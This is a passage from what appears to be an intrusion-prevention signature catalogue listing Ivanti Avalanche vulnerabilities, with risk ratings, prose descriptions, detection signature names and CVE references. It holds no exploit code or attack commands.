Description: An insecure deserialization vulnerability has been reported in the Ivanti Avalanche Certificate Management Server. The vulnerability is due to insufficient validation of serialized data sent to the Certificate Management Server. A remote attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the context of SYSTEM.
Situation: Generic_TCP-Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization
Back to top

Ivanti-Avalanche-Copyfile-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1742-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of user data within the copyFile method. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: HTTP_CRL-Ivanti-Avalanche-Copyfile-Directory-Traversal
References:
CVE-2024-23535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23535
Back to top

Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of serialized data sent to the DataRepository service causes an insecure deserialization vulnerability in Ivanti Avalance. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization
References:
CVE-2021-42130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42130
Back to top

Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An arbitrary file upload vulnerability exists in Ivanti Avalanche Enterprise Service. This vulnerability is due to insufficient validation of file path for file uploading in the Central FileStore. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary file upload in the security context of SYSTEM and lead to possible remote code execution.
Situation: HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload
References:
CVE-2021-42125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42125
Back to top

Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1425-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of the Central FileStore configuration fields causes a command injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection
References:
CVE-2021-42129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42129
Back to top

Ivanti-Avalanche-Enterpriseserver-Getprofileapplicationdata-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1477-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of data sent to the EnterpriseServer service causes an SQL injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Getprofileapplicationdata-SQL-Injection
Back to top

Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of data sent to the EnterpriseServer service causes an SQL injection vulnerability in Ivanti Avalance. A succesful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection
Back to top

Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Malfunction
Description: An authentication bypass has been reported in Ivanti Avalanche Enterprise Server. The vulnerability is due to exposure of a dangerous method. A remote attacker could exploit the vulnerability by sending crafted requests to a target server. Successful exploitation would allow an attacker to obtain system configuration information, including passwords that could be used to bypass authentication in other Avalanche services.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass
References:
CVE-2023-28126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28126
Back to top

Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection

About this vulnerability: A vulnerability in the Ivanti Avalanche EnterpriseServer service.
Risk: High
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Platform: Generic
Software: Ivanti Avalanche
Type: SQL Injection
Description: A vulnerability in the Ivanti Avalanche EnterpriseServer service, versions prior to 6.3.4, which allows remote attackers to execute arbitrary SQL commands, due to the insufficient validation of data sent to the EnterpriseServer service.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection
Back to top

Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1438-5242
Last changed: sgpkg-ips-1438-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of data sent to the EnterpriseServer service causes an SQL injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection
References:
CVE-2021-42131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42131
Back to top

Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Malfunction
Description: Lack of proper authentication in certain operations in Ivanti Avalanche Enterprise Server allows an attacker to bypass access controls.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass
References:
CVE-2021-42128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42128
Back to top

Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Malfunction
Description: A authentication bypass vulnerability has been reported in the Ivanti Avalanche Enterprise Server. The vulnerability is due to lack of authentication and input validation for certain functionality. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in access control policy bypass.
Situation: Generic_CS-Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass
Back to top

Ivanti-Avalanche-Extractzipentry-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of file names in the method extractZipEntry. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: File-Zip_Ivanti-Avalanche-Extractzipentry-Directory-Traversal
References:
CVE-2024-24994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24994
Back to top

Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1702-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An arbitrary file upload vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to improper input validation in the FileStoreConfig app. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploring this vulnerability could result in remote code execution as SYSTEM.
Situation: HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload
References:
CVE-2023-32564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32564
Back to top

Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An arbitrary file upload vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to improper input validation in the FileStoreConfig app. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploring this vulnerability could result in remote code execution as SYSTEM.
Situation: HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload
References:
CVE-2023-46263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46263
Back to top

Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Risk: High
First detected in: sgpkg-ips-1746-5242
Last changed: sgpkg-ips-1746-5242
Platform: Windows
Software: Ivanti Avalanche
Type: Input Validation
Description: A vulnerability in Ivanti Avalanche, versions prior to 6.4.3.602, which allows remote attackers to upload arbitrary files and execute code, due to improper input validation in the FileStoreConfig app.
Situation: HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload
References:
CVE-2024-29848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29848
Back to top

Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An arbitrary file upload vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to improper input validation in the FileStoreConfig app. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploring this vulnerability could result in remote code execution.
Situation: HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload
References:
CVE-2023-28128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28128
Back to top

Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of user data within the getAdhocFilePath method. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: HTTP_CRL-Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal
References:
CVE-2024-24992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24992
Back to top

Ivanti-Avalanche-Imagefilepath-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1473-5242
Last changed: sgpkg-ips-1473-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: Improper input sanitization causes a directory traversal vulnerability in the imageFilePath parameter of Ivanti Avalanche. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CSU-Ivanti-Avalanche-Imagefilepath-Directory-Traversal
References:
CVE-2021-30497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497
Back to top

Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in the Ivanti Avalanche JwtTokenUtility. The vulnerability is due to insufficient validation of serialized data processed by the JwtTokenUtility. A remote attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the context of SYSTEM.
Situation: Generic_TCP-Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization
References:
CVE-2022-36971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36971
Back to top

Ivanti-Avalanche-Notification-Server-Insecure-Deserialization

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in the Ivanti Avalanche Notification Server. The vulnerability is due to insufficient validation of serialized data sent to the Notification Server. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the context of SYSTEM.
Situation: Generic_CS-Ivanti-Avalanche-Notification-Server-Insecure-Deserialization
Back to top

Ivanti-Avalanche-Path-Traversal-CVE-2023-41474

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1686-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A path traversal vulnerability has been reported in Ivanti Avalanche. A remote, authenticated attacker can use this vulnerability to read arbitrary files in the AvalancheWeb directory.
Situation: HTTP_CRL-Ivanti-Avalanche-Path-Traversal-CVE-2023-41474
References:
CVE-2023-41474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41474
Back to top

Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient input validation in the runAgentRestarter method causes a command injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary code on the target with system privileges.
Situation: Generic_CS-Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection
References:
CVE-2021-42132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42132
Back to top

Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1792-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported for Ivanti Avalanche Remote Control Server. This vulnerability is due to a directory traversal in the Skins.deleteSkin() method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file deletion or, in the worst case, denial of service.
Situation: HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
References:
CVE-2024-38652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38652
Back to top

Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1573-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Malfunction
Description: An authentication bypass has been reported in Ivanti Avalanche Remote Control Server. The vulnerability is due to improper validation of configuration property parameters. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to a target server. Successful exploitation would allow an unauthenticated user to login as an authenticated user.
Situation: HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
References:
CVE-2022-44574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44574
Back to top

Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported for Ivanti Avalanche Remote Control Server. This vulnerability is due to improper input validation in the updateSkin function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.
Situation: HTTP_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
References:
CVE-2023-32563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32563
Back to top

Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: A server-side request forgery vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to insufficient validation of user input sent to the Remote Control Server used to build a request string. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to the target server. Successfully exploiting this vulnerability could result in information disclosure or spoofing conditions.
Situation: HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery
ARCserve_CS-Potential-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery
References:
CVE-2023-46262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46262
Back to top

Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of the request URI. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure.
Situation: HTTP_CSU-Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal
References:
CVE-2024-47011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47011
Back to top

Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An authentication bypass vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of the request URI. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure.
Situation: HTTP_CRL-Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass
References:
CVE-2021-22962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22962
Back to top

Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: A vulnerability in Ivanti Avalanche, versions prior to 6.4.5, which allows remote attackers to bypass authentication and disclose sensitive information, due to the lack of input validation of the request URI.
Situation: HTTP_CS-Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass
References:
CVE-2024-47009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47009
Back to top

Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: An XML External Entity Injection vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to insufficient validation of user input sent to the SmartDeviceServer. A remote, unauthenticated attacker could exploit this vulnerability by sending malicious XML in an HTTP request to the target server. Successful exploitation could result in the disclosure of information in the context of SYSTEM.
Situation: File-TextId_Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection
References:
CVE-2023-46265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46265
Back to top

Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1597-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Ivanti Avalanche SmartDeviceServer. The vulnerability is due to a lack of input validation in the getLogFile method of the DeviceLogsManager class. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the read of arbitrary files on the target server under the security context of the server process.
Situation: Generic_TCP-Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal
References:
CVE-2022-36982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36982
Back to top

Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to a insufficient validation of input in the DeviceLogResource class for the Smart Device Server. A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.
Situation: HTTP_CSU-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
Generic_CS-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
References:
CVE-2022-36981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36981
Back to top

Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of serialized data sent to the StatServer service of Ivanti Avalanche causes an insecure deserialization vulnerability, which can be exploited to allow an attacker to execute arbitrary code on the target with system privileges.
Situation: Generic_CS-Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization
References:
CVE-2021-42127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42127
Back to top

Ivanti-Avalanche-Validateamcwsconnection-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1857-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Improper input validation in data sent to the Remote Control Server causes a server-side request forgery vulnerability in Ivanti Avalanche. A successful exploitation may lead to the disclosure of privileged information.
Situation: HTTP_CRL-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery
ARCserve_CS-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery
References:
CVE-2024-47008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47008
Back to top

Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Insufficient validation of data sent to the Web File Server before deserialization causes a vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary code on the target.
Situation: Generic_CS-Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization
References:
CVE-2022-36974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36974
Back to top

Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Race Condition
Description: Improper synchronization of requests received and responses sent by the Avalanche Web Server causes an authentication bypass vulnerability which can be exploited to gain access to the system without authentication.
Situation: Generic_CS-Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass
References:
CVE-2022-36980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36980
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of messages sent over port 1777. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the vulnerable service.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow
References:
CVE-2023-32560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32560
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-TV_FN-Infinite-Loop

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Infinite Loop
Description: A denial of service vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to an infinite loop when handling TV_FN InfoRail headers in the WLAvalancheService.exe component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference
References:
CVE-2024-50319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50319
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to a memory access error in WLAvalancheService.exe when handling Type 100 InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference
References:
CVE-2024-37399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37399
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1684-5242
Last changed: sgpkg-ips-1684-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Buffer Overflow
Description: A stack-buffer overflow vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to improper input validation when handling InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service or, in the worst case, remote code execution in the security context of SYSTEM.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow
References:
CVE-2023-41727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41727
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1800-5242
Last changed: sgpkg-ips-1802-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to a memory access error in WLAvalancheService.exe when handling Type 101 and 102 properties in InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service. CVE identifiers CVE-2024-50317 and CVE-2024-50318 are also assigned to this vulnerability.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference
References:
CVE-2024-47007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47007
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
